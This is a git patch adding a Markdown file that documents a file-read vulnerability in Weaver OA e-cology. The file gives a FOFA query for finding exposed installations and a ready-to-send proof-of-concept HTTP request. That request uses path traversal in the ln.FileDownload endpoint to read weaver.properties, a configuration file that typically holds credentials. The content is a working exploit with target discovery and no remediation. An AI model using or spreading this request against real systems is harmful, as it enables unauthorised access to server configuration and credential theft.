From 3cd59e6ca851ada184ee2456eebce2e8be51e725 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Thu, 9 May 2024 08:48:51 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E6=B3=9B=E5=BE=AEOA-E-Cology-FileDown?= =?UTF-8?q?load=E6=96=87=E4=BB=B6=E8=AF=BB=E5=8F=96=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 泛微OA-E-Cology-FileDownload文件读取漏洞.md | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 泛微OA-E-Cology-FileDownload文件读取漏洞.md diff --git a/泛微OA-E-Cology-FileDownload文件读取漏洞.md b/泛微OA-E-Cology-FileDownload文件读取漏洞.md new file mode 100644 index 0000000..8146d71 --- /dev/null +++ b/泛微OA-E-Cology-FileDownload文件读取漏洞.md @@ -0,0 +1,19 @@ +## 泛微OA-E-Cology-FileDownload文件读取漏洞 + + +## fofa +``` +app="泛微-OA(e-cology)" +``` + +## poc +``` +GET /weaver/ln.FileDownload?fpath=../ecology/WEB-INF/prop/weaver.properties HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +```